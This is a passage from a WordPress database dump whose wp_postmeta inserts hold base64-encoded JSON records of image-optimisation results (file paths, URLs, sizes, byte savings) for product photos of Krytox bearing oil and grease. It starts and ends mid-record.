wczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtOS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtOS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTYxLCJ0aW1lIjoxNDgzNTc4MTAyLCJpZCI6MTAzMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTktNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTktNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE2ODksInRpbWUiOjE0ODM1NzgxMDYsImlkIjoxMDMwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MTEsInRpbWUiOjE0ODM1NzgxMDksImlkIjoxMDMwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0NTEsInRpbWUiOjE0ODM1NzgxMTMsImlkIjoxMDMwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo0NjQsInRpbWUiOjE0ODM1NzgxMTYsImlkIjoxMDMwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo2NjgsInRpbWUiOjE0ODM1NzgxMTksImlkIjoxMDMwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo3MzksInRpbWUiOjE0ODM1NzgxMjMsImlkIjoxMDMwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS05LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxMDExLCJ0aW1lIjoxNDgzNTc4MTI2LCJpZCI6MTAzMH1d'); 
INSERT INTO `wp_postmeta` VALUES (29828, 1028, 'wpfc_optimisation_reduction', '34733'); 
INSERT INTO `wp_postmeta` VALUES (29829, 1028, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LmpwZyIsIndpZHRoIjozODg4LCJoZWlnaHQiOjI1OTIsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzgxMzEsImlkIjoiMTAyOCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxNzY1LCJ0aW1lIjoxNDgzNTc4MTM1LCJpZCI6MTAyOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTctODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTctODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTctODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjQwNzIsInRpbWUiOjE0ODM1NzgxMzksImlkIjoxMDI4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6NDAyOSwidGltZSI6MTQ4MzU3ODE0NCwiaWQiOjEwMjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjc0NDQsInRpbWUiOjE0ODM1NzgxNTAsImlkIjoxMDI4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MTI4MCwidGltZSI6MTQ4MzU3ODE1NCwiaWQiOjEwMjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo5NDAsInRpbWUiOjE0ODM1NzgxNTcsImlkIjoxMDI4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MTE0NCwidGltZSI6MTQ4MzU3ODE2MSwiaWQiOjEwMjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoyNzAzLCJ0aW1lIjoxNDgzNTc4MTY1LCJpZCI6MTAyOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6OTIxLCJ0aW1lIjoxNDgzNTc4MTY5LCJpZCI6MTAyOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MTEwOCwidGltZSI6MTQ4MzU3ODE3MiwiaWQiOjEwMjh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTctMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTctMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTctMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEzMzAsInRpbWUiOjE0ODM1NzgxNzYsImlkIjoxMDI4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS03LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoyMTIzLCJ0aW1lIjoxNDgzNTc4MTc5LCJpZCI6MTAyOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MjQ4MywidGltZSI6MTQ4MzU3ODE4MywiaWQiOjEwMjh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTctNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTctNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTctNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjMzOTEsInRpbWUiOjE0ODM1NzgxODcsImlkIjoxMDI4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29830, 1027, 'wpfc_optimisation_reduction', '15197'); 
INSERT INTO `wp_postmeta` VALUES (29831, 1027, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS02LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS02LmpwZyIsIndpZHRoIjo1NzYwLCJoZWlnaHQiOjM4NDAsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzgxOTIsImlkIjoiMTAyNyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS02LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS02LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS02LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3OTksInRpbWUiOjE0ODM1NzgxOTYsImlkIjoxMDI3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNi04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNi04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTI2OCwidGltZSI6MTQ4MzU3ODIwMCwiaWQiOjEwMjd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0a